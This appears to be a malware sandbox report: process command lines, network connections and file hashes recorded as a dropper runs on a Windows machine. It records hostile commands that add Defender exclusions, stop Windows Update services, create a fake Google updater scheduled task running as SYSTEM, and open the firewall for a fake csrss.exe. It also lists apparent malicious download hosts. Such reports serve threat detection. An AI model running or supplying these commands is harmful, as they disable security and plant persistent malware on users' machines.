"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2eY4396.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2eY4396.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6456 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7My72nk.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7My72nk.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7416 -ip 7416

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7416 -s 540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8sT689HF.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8sT689HF.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7572 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7600 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8576 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8576 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9EE3QR1.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9EE3QR1.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\A9C8.exe

C:\Users\Admin\AppData\Local\Temp\A9C8.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,6928482214711890243,4800566490649117600,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,6928482214711890243,4800566490649117600,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,6928482214711890243,4800566490649117600,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6928482214711890243,4800566490649117600,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6928482214711890243,4800566490649117600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6928482214711890243,4800566490649117600,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6928482214711890243,4800566490649117600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\F941.exe

C:\Users\Admin\AppData\Local\Temp\F941.exe

C:\Users\Admin\AppData\Local\Temp\FCEB.exe

C:\Users\Admin\AppData\Local\Temp\FCEB.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6928482214711890243,4800566490649117600,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6928482214711890243,4800566490649117600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\FCEB.exe

C:\Users\Admin\AppData\Local\Temp\FCEB.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6928482214711890243,4800566490649117600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,6928482214711890243,4800566490649117600,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,6928482214711890243,4800566490649117600,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 /prefetch:8

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\A65B.exe

C:\Users\Admin\AppData\Local\Temp\A65B.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
RU 5.42.92.190:80 5.42.92.190 tcp
US 172.67.209.38:80 killredls.pw tcp
NL 194.169.175.118:80 194.169.175.118 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 190.92.42.5.in-addr.arpa udp
US 194.49.94.80:42359 tcp
US 8.8.8.8:53 80.94.49.194.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
IT 185.196.9.161:80 185.196.9.161 tcp
RU 5.42.64.16:443 tcp
US 8.8.8.8:53 161.9.196.185.in-addr.arpa udp
US 8.8.8.8:53 16.64.42.5.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 5.42.64.16:443 tcp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 bluepablo.fun udp
US 172.67.180.92:80 bluepablo.fun tcp
US 8.8.8.8:53 92.180.67.172.in-addr.arpa udp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 8.8.8.8:53 152.141.79.40.in-addr.arpa udp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
RU 5.42.92.51:19057 tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 8.8.8.8:53 host-file-host6.com udp
US 172.67.180.92:80 bluepablo.fun tcp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TD2LQ80.exe

MD5 ba40e4ffcb06c0f900b2ca4fe0318b6c
SHA1 99ca465c2c8579d750ca863514416a8c78fcb4af
SHA256 5334772944a2fe41433ac2dad31383168b09038d43fa24bd9f4e8067f713db8f
SHA512 534e192b0dea5cd0ba364b9d643ec0ef438d71460f7977258c628b76ae7f5c797e231cc238ca5bde463ff0e7662f754421d17e9de3e6a9b55726ae29d4af6496

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TD2LQ80.exe

MD5 ba40e4ffcb06c0f900b2ca4fe0318b6c
SHA1 99ca465c2c8579d750ca863514416a8c78fcb4af
SHA256 5334772944a2fe41433ac2dad31383168b09038d43fa24bd9f4e8067f713db8f
SHA512 534e192b0dea5cd0ba364b9d643ec0ef438d71460f7977258c628b76ae7f5c797e231cc238ca5bde463ff0e7662f754421d17e9de3e6a9b55726ae29d4af6496

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ih4sd84.exe

MD5 b9f8e077ee394680cc79d96ddd821890
SHA1 2229da3a2b888fa2cda2463c9f63b97443d99cab
SHA256 964e80d6ac91f571eb7ab1cf46ba8049f5950f8fabbfb5ed9c319b3414019491
SHA512 34501a516828435647a4dabe05665d547136b5eba28959076146005f5d32b748076ed220678cba4a2d41e96dc06047e281da0ac2e2f0351bb76a52760d197bd4

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ih4sd84.exe

MD5 b9f8e077ee394680cc79d96ddd821890
SHA1 2229da3a2b888fa2cda2463c9f63b97443d99cab
SHA256 964e80d6ac91f571eb7ab1cf46ba8049f5950f8fabbfb5ed9c319b3414019491
SHA512 34501a516828435647a4dabe05665d547136b5eba28959076146005f5d32b748076ed220678cba4a2d41e96dc06047e281da0ac2e2f0351bb76a52760d197bd4

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\HG4OZ12.exe

MD5 31ea9b9b0c39803ee73cba2db1784d84
SHA1 a1170c46a448329a0022b17d0df8f0809fa4ccb0
SHA256 1072253a8c4596107625e3d5f689e39d5c3c3d6b7943a6dd1bbc5718c4d8cb68
SHA512 9e64d824db052f58bea5ed2d6dcf04cf28468d714e842338fddda1687a75693288e68209fa4443d0c5825e2bceae3f39a87c5ddea769361c6b18370284cd9686

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\HG4OZ12.exe

MD5 31ea9b9b0c39803ee73cba2db1784d84
SHA1 a1170c46a448329a0022b17d0df8f0809fa4ccb0
SHA256 1072253a8c4596107625e3d5f689e39d5c3c3d6b7943a6dd1bbc5718c4d8cb68
SHA512 9e64d824db052f58bea5ed2d6dcf04cf28468d714e842338fddda1687a75693288e68209fa4443d0c5825e2bceae3f39a87c5ddea769361c6b18370284cd9686

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe

MD5 ab83daf58f2e04dd51a019da6d634db3
SHA1 a961dc67503b7e5662a9c9d0f08ad59f665a31f4
SHA256 e16b03c1afa0e26d4e186f2f4946b45af202307d3ad26e4daa7d5192ce2e90a7
SHA512 0b3fe6b87a915b1f5d1fd9ea8fdfb9234cb3272ac9c19a7ecc1acb33a4908b130a7d114897ab89da2460686c4f39fe3c42a7cb31d899551313b7a541cd776224

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe

MD5 ab83daf58f2e04dd51a019da6d634db3
SHA1 a961dc67503b7e5662a9c9d0f08ad59f665a31f4
SHA256 e16b03c1afa0e26d4e186f2f4946b45af202307d3ad26e4daa7d5192ce2e90a7
SHA512 0b3fe6b87a915b1f5d1fd9ea8fdfb9234cb3272ac9c19a7ecc1acb33a4908b130a7d114897ab89da2460686c4f39fe3c42a7cb31d899551313b7a541cd776224

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
